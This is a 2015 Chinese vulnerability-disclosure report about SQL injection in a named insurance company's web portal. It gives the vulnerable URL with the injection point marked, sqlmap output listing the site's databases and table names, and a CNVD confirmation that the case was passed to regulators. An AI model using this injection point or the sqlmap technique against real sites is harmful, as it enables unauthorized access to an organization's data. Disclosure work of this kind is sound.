2015-07-28: 细节已通知厂商并且等待厂商处理中 2015-08-01: 厂商已经确认,细节仅向厂商公开 2015-08-11: 细节向核心白帽子及相关领域专家公开 2015-08-21: 细节向普通白帽子公开 2015-08-31: 细节向实习白帽子公开 2015-09-15: 细节向公众公开
........
...............
http://www.taishanpic.com/tshbx/PortalContentList.aspx?Category=91522111-d240-494e-b20c-d3a94b09a505*注:*号为注入点available databases [6]:[*] master[*] model[*] msdb[*] oabase[*] oabase0425[*] tempdb[03:31:02] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[03:31:02] [INFO] fetching tables for database 'oabase'[03:31:02] [INFO] fetching number of tables for database 'oabase'[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': 1165[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.AclOwnerType[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activity[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activity_PostRuleNames[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activity_PreRuleNames[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activity_RawParticipants[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activiy_Reeceivers[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.AgentManager[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_AddGoodsInfos[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_FLGoods[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_GoodsBuyApply[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_GoodsInfos[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_GoodsProvideInfos[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_GoodsStorage[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_RefundGoods[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_StoreHouse[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.CL_DriverInfos[03:31:02] [INFO] retrieving the length of query output[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': 26[03:31:02] [INFO] resumed from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.CL_VhicleA...[03:31:02] [INFO] retrieving pending 12 query output characters[03:31:18] [INFO] retrieved: __pl_c___o_s 5/12 (42%)[03:31:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the reque[03:31:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:31:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:31:28] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:31:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:31:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:31:32] [INFO] retrieved: A_pl_c__io_s 7/12 (58%)[03:31:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the reque[03:31:35] [INFO] retrieved: Applic__io_s 9/12 (75%)[03:31:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the reque[03:31:49] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:31:53] [INFO] retrieved: Applica_io_s 10/12 (83%)[03:31:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requ[03:32:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:32:15] [INFO] retrieved: Applicatio_s 11/12 (92%)[03:32:20] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requ[03:32:23] [INFO] retrieved: Applications[03:32:23] [INFO] retrieving the length of query output[03:32:23] [INFO] retrieved: [03:32:44] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:33:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request24[03:33:36] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:33:50] [INFO] retrieved: ____C___e_ic____________ 4/24 (17%)[03:33:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to ret[03:33:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:33:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:09] [INFO] retrieved: dbo.C__Vehic____________ 10/24 (42%)[03:34:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re[03:34:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:22] [INFO] retrieved: dbo.C__Vehicle_l_a__nf__ 16/24 (67%)[03:34:24] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re[03:34:24] [INFO] retrieved: dbo.C__Vehicle_l_a__nfo_ 17/24 (71%)[03:34:25] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re[03:34:28] [INFO] retrieved: dbo.CL_Vehicle_l_a__nfo_ 19/24 (79%)[03:34:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re[03:34:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:38] [INFO] retrieved: dbo.CL_VehicleClean_nfo_ 22/24 (92%)[03:34:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re[03:34:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:34:59] [INFO] retrieved: dbo.CL_VehicleCleanInfo_ 23/24 (96%)[03:35:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re[03:35:29] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:35:31] [INFO] retrieved: dbo.CL_VehicleCleanInfos[03:35:31] [INFO] retrieving the length of query output[03:35:31] [INFO] retrieved: 19[03:35:58] [INFO] retrieved: _______V__ic_______ 3/19 (16%)[03:36:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry th[03:36:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:36:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[03:36:00] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:02] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:02] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:04] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:06] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:07] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:23] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:25] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:25] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:28] [ERROR] thread 10: unable to connect to the target url or proxy[03:36:29] [CRITICAL] something unexpected happened inside the threads
............
危害等级:中
漏洞Rank:10
确认时间:2015-08-01 15:24
CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无